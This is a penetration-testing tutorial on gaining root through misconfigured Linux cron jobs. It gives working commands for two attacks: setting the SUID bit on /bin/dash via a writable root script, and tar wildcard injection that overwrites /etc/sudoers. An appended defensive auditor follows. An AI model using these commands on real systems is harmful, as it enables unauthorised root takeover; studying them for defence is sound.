After solving several OSCP challenges we decided to write an article on the various methods used for Linux privilege escalation, which could be helpful to our readers in their penetration testing projects. In this article we will learn "Privilege Escalation by exploiting Cron Jobs" to gain root access on a remote host machine, and also examine how a badly implemented cron job can lead to privilege escalation. If you have solved CTF challenges for post exploitation, then by reading this article you will recognise the several loopholes that lead to privilege escalation.
For details, you can read our previous articles where we applied this trick for privilege escalation. Open the links given below:
Link1: Hack the Box Challenge: Europa Walkthrough
Link2: Hack the Milnet VM (CTF Challenge)
Table of content
· Introduction
· Cron job
· Crontab syntax
· Crontab File overwrite
· Lab Setup (Ubuntu)
· Exploiting cron job (Kali Linux)
· Crontab Tar wildcard Injection
· Lab Setup (Ubuntu)
· Exploiting cron job (Kali Linux)
Let’s Start!!!
What is a cron job?
Cron jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They are most commonly used for sysadmin jobs such as backups or cleaning the /tmp/ directory, and so on. The name cron is tied to crontab, the schedule file, which is present inside the /etc directory.
For example: inside crontab we can add the following entry to reset (truncate) the Apache error log automatically every 1 hour. The fields are minute, hour, day of month, month and day of week, followed by the command.
0 * * * * printf "" > /var/log/apache/error_log
Crontab File overwrite
Lab Setup for a poorly configured cron job
Objective: set a new job with the help of crontab to run a Python script which will erase all data inside a particular directory.
Let's assume "cleanup" is the directory whose data will be cleared automatically every two minutes. Thus we have saved some data inside /home/cleanup.
mkdir cleanup
cd cleanup
echo "hello friends" > 1.txt
echo "ALL files will be deleted in 2 minutes" > 2.txt
echo "" > 1.php
echo "" > 2.php
ls
As you can observe from the given image, some files are stored inside the cleanup directory.
Now write a Python program in any other directory to delete the data inside /home/cleanup and give it full permissions.
cd /tmp
nano cleanup.py
#!/usr/bin/env python
import os
import sys
try:
    # delete everything under /home/cleanup (cron will run this as root)
    os.system('rm -r /home/cleanup/*')
except:
    sys.exit()
chmod 777 cleanup.py
At last, schedule a task with the help of crontab to run cleanup.py every 2 minutes.
nano /etc/crontab
*/2 * * * * root /tmp/cleanup.py
Now let's verify the objective.
cd /home/cleanup
ls
date
ls
Coool!! It is working: as you can see, all files have been deleted after two minutes.
Post Exploitation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I successfully log in to the victim's machine through SSH and get a non-root user terminal. Execute the following commands as shown below.
cat /etc/crontab
ls -al /tmp/cleanup.py
cat /tmp/cleanup.py
From the above steps we notice that crontab is running the Python script every two minutes; now let's exploit it.
There are many methods to gain root access; in this method we set the SUID bit on /bin/dash. It is quite simple: first open the file with an editor, for example nano cleanup.py, and replace the line "rm -r /home/cleanup/*" with the following line:
os.system('chmod u+s /bin/dash')
After two minutes it will set the SUID permission on /bin/dash, and when you run it, it will give root access.
/bin/dash
id
whoami
Awesome!! We hit the goal.
Crontab Tar Wildcard Injection
Lab Setup
Objective: schedule a task with the help of crontab to take a backup of the html directory with the tar archival program.
The directory whose backup you are going to take should have executable permission.
Now schedule a task with the help of crontab to run the tar archival program, taking a backup of /var/www/html inside /var/backups every 1 minute.
nano /etc/crontab
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
Let's verify whether the schedule is working by executing the following commands.
cd /var/backups
ls
date
From the image given below you can notice that the html.tgz file has been generated after 1 minute.
Post Exploitation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I successfully log in to the victim's machine through SSH and get a non-root user terminal. Then open crontab to see whether any job is scheduled.
cat /etc/crontab
Here we notice that the target has scheduled a tar archival program every 1 minute, and we know that the cron job runs as root. Let's try to exploit it.
Execute the following commands to grant sudo rights to the logged-in user; this post-exploitation technique is known as wildcard injection.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
Now after 1 minute it will grant sudo rights to the user ignite, as you can confirm from the image given below.
sudo -l
sudo bash
whoami
YUPPIEEEE!!! We have successfully obtained root access.
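As an added defender's check that is not part of the original article, the following Python audits /etc/crontab-style entries for the two misconfigurations both labs above depend on: a root job whose script is writable by other users, and a root tar job fed a shell wildcard. The sample crontab text and the permission table are constructed here to mirror the lab entries; on a real host the default mode lookup uses os.stat.

```python
# Added example, not from the original article: audit /etc/crontab entries for
# a root job running a script other users can write, and a root tar job fed a wildcard.
import os, re, shlex, stat
# /etc/crontab fields: minute hour day-of-month month day-of-week user command
ENTRY_RE = re.compile(r'^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$')

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or re.match(r'^\w+=', line):
            continue
        m = ENTRY_RE.match(line)
        if m:
            yield m.group('user'), m.group('cmd')

def real_mode(path):
    # Permission bits of path, or None if it cannot be stat'ed.
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    except OSError:
        return None

def audit(text, mode_of=real_mode):
    """Return (issue, command) pairs for root jobs; mode_of can be a lookup table."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != 'root':
            continue
        argv = shlex.split(cmd)
        prog = argv[0] if argv else ''
        mode = mode_of(prog) if prog.startswith('/') else None
        if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(('writable-script', cmd))
        if os.path.basename(prog) == 'tar' and any(
                '*' in a or '?' in a for a in argv[1:]):
            findings.append(('tar-wildcard', cmd))
    return findings

# Constructed sample mirroring the two lab entries above plus one safe job.
SAMPLE = """SHELL=/bin/sh
*/2 * * * * root /tmp/cleanup.py
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
0 * * * * root /usr/local/sbin/rotate-logs
"""
# Constructed permission table standing in for os.stat (cleanup.py is mode 777).
SAMPLE_MODES = {'/tmp/cleanup.py': 0o777, '/usr/local/sbin/rotate-logs': 0o755}
def demo():
    return audit(SAMPLE, mode_of=SAMPLE_MODES.get)
```

On a live host, audit(open('/etc/crontab').read()) checks the real file modes. The fixes are to make the script root-owned with mode 0755 and to archive with tar -zcf /var/backups/html.tgz -C /var/www/html . so that no file name in the directory is expanded into a tar option.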